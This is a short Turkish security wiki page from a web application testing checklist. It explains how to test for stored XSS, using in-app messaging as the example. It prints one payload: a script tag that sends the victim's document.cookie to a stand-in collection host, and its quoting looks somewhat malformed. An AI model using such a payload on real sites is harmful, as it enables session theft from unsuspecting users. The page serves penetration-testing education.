Depolanmış (Stored) XSS Testleri

BGA Security Wiki sitesinden
Burcu (Mesaj | katkılar) tarafından oluşturulmuş 23:42, 26 Mart 2017 tarihli sürüm (Yeni sayfa: "Category:Web Uygulama Güvenlik Testleri Kontrol Listesi '''Amaç:''' Depolanmış XSS zafiyetinden faydalanılarak kullanıcıların tarayıcılarında hedef sistem üzerinden...")
(fark) ← Önceki hâli | En güncel hâli (fark) | Sonraki hâli → (fark)
Şuraya atla: kullan, ara

Amaç:

Depolanmış XSS zafiyetinden faydalanılarak kullanıcıların tarayıcılarında hedef sistem üzerinden kod çalıştırmak.

Araçlar:

  • Firefox

Adımlar:

  • Hedef uygulamada girdi noktalarından girilen değerlerin daha sonra başka ekranda gösterilmek veya sayfanın bir yerinde kullanılmak amacıyla kaydedildiği durumlar aranır.
  • Örneğin uygulamanın kendi içindeki mesajlaşmasında gerekli arındırma (sanitizing) işlemleri yapılmadıysa bir kullanıcı başka bir kullanıcıya;
<script>document.location=”cookiekaydet.com/kaydet.php?val”=+document.cookie</script>

gibi zararlı kodlar içeren mesajlar gönderilerek kullanıcıların oturum bilgileri ele geçirilebilir veya kullanıcılar istemleri dışında başka sayfalara yönlendirilebilir. Hatta kullanıcıların tarayıcıları üzerinden kişisel bilgisayarlarına daha ileri saldırılar yapılabilir.

Kaynak:[değiştir]

  • XSS Attacks - Cross Site Scripting Exploits & Defense